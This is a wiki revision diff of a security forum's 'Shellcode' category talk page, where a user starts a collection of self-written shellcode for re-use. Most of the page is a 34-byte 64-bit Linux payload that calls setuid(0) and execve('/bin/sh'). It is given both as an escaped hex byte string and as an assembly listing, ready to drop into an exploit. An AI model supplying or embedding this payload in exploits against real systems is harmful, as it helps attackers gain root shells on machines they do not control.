Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Category talk:Shellcode"
From NetSec
(Created page with "Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! ~~~~ ==...") |
(→Linux) |
||
| Line 10: | Line 10: | ||
==== 64-bit ==== | ==== 64-bit ==== | ||
===== setuid(0); execve('/bin/sh'); - 34 bytes ===== | ===== setuid(0); execve('/bin/sh'); - 34 bytes ===== | ||
| − | + | [[User:Hatter|Hatter]] 05:27, 19 August 2012 (MSK) | |
* '''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05''' | * '''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05''' | ||
{{code|text=<source lang="asm"> | {{code|text=<source lang="asm"> | ||
Revision as of 03:27, 19 August 2012
Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)
Contents
Collections
|
This page needs shellcodes, and will be updated with it shortly. Thanks for your patience. |
Windows
Linux
64-bit
setuid(0); execve('/bin/sh'); - 34 bytes
Hatter 05:27, 19 August 2012 (MSK)
- \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
.section .data .section .text .globl _start _start: mov $0, %rdi mov $105, %rax syscall # a function is f(%rdi,%rdx,%rsi) mov $59, %rax # execve(filename, argv, envp) push $0x00 mov %rsp, %rdx # argv is null mov %rsp, %rsi # envp is null mov $0x0068732f6e69622f, %rcx push %rcx mov %rsp, %rdi # filename is '/bin/sh\0' syscall mov $60, %rax mov $0, %rdi syscall |
